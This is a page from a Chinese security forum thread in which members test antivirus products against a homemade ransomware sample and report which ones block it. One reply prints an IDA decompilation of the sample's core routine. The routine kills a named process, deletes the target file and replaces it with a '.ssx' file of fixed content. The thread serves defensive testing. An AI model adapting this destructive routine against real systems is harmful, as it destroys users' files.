楼主: idgg007
收起左侧

[病毒样本] 自制勒索

  [复制链接]
761773275
发表于 2021-6-6 18:38:41 | 显示全部楼层
KES锁库主防杀




护士拦截,但没回滚




本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x

评分

参与人数 1人气 +3 收起 理由
Picca + 3 版区有你更精彩: )

查看全部评分

huicuan
发表于 2021-6-6 21:59:19 | 显示全部楼层
00006666 发表于 2021-6-5 23:19
多步主防:智量防护性能比微点好。

我个人认为还是瑞星能活下来
Inject-D
发表于 2021-6-7 13:38:24 | 显示全部楼层
idgg007 发表于 2021-6-5 22:14
请问是否需要公布源码?

不用吧...
我用ida把加密函数看了个干净
  1. void __cdecl Start(char *Buffer)                                                            
  2. {                                                                                          
  3.   DWORD v1; // eax                                                                          
  4.   char v2[244]; // [esp+58h] [ebp-180h] BYREF                                               
  5.   CHAR Str1[100]; // [esp+14Ch] [ebp-8Ch] BYREF                                             
  6.   int v4; // [esp+1B0h] [ebp-28h]                                                           
  7.   int v5; // [esp+1B4h] [ebp-24h]                                                           
  8.   int i; // [esp+1B8h] [ebp-20h]                                                            
  9.   int v7; // [esp+1BCh] [ebp-1Ch]                                                           
  10.                                                                                             
  11.   puts(Buffer);                                                                             
  12.   v7 = 0;                                                                                   
  13.   for ( i = 0; Buffer[i]; ++i )                                                            
  14.   {                                                                                         
  15.     if ( Buffer[i] == 92 )                                                                  
  16.       v7 = i;                                                                              
  17.   }                                                                                         
  18.   v5 = v7 + 1;                                                                              
  19.   v4 = 0;                                                                                   
  20.   while ( Buffer[v5] )                                                                     
  21.   {                                                                                         
  22.     Str1[v4++] = Buffer[v5];                                                               
  23.     Str1[v4] = 0;                                                                           
  24.     ++v5;                                                                                   
  25.   }                                                                                         
  26.   if ( strcmp(Str1, "鍕掔储.exe") )                                                            
  27.   {                                                                                         
  28.     if ( GetProcessCount(Str1) )                                                            
  29.     {                                                                                       
  30.       v1 = GetProcessIdFromName(Str1);                                                      
  31.       KillProcess(v1);                                                                     
  32.     }                                                                                       
  33.     remove(Buffer);                                                                        
  34.     strcat(Buffer, ".ssx");                                                                 
  35.     std::ofstream::basic_ofstream(Buffer, 16);                                             
  36.     std::operator<<<std::char_traits<char>>((std::ostream::sentry *)v2, asc_4CD030);        
  37.     std::ofstream::~ofstream(v2);                                                           
  38.   }                                                                                         
  39. }                                                  
复制代码

NT狼狼
发表于 2021-6-7 15:34:11 | 显示全部楼层
猎豹安全浏览器

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
qwe12301
发表于 2021-6-7 16:03:40 | 显示全部楼层
NT狼狼 发表于 2021-6-7 15:34
猎豹安全浏览器

测试个主防试试呢?本帖不是讨论能不能杀的问题,而是能不能拦住
a27573
发表于 2021-6-7 16:40:42 | 显示全部楼层
idgg007 发表于 2021-6-5 22:14
请问是否需要公布源码?

gcc编译又没加壳,公不公布一个样
NT狼狼
发表于 2021-6-7 16:46:44 | 显示全部楼层
qwe12301 发表于 2021-6-7 16:03
测试个主防试试呢?本帖不是讨论能不能杀的问题,而是能不能拦住

好,我试试
Clarkpyu
发表于 2021-6-11 10:25:13 | 显示全部楼层
呜呜下不了
idgg007
 楼主| 发表于 2021-6-11 21:22:19 | 显示全部楼层

过一段时间就下得了了
a2120258
发表于 2021-6-12 16:03:52 | 显示全部楼层
微点完全拦截
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-12-27 09:25 , Processed in 0.104836 second(s), 15 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表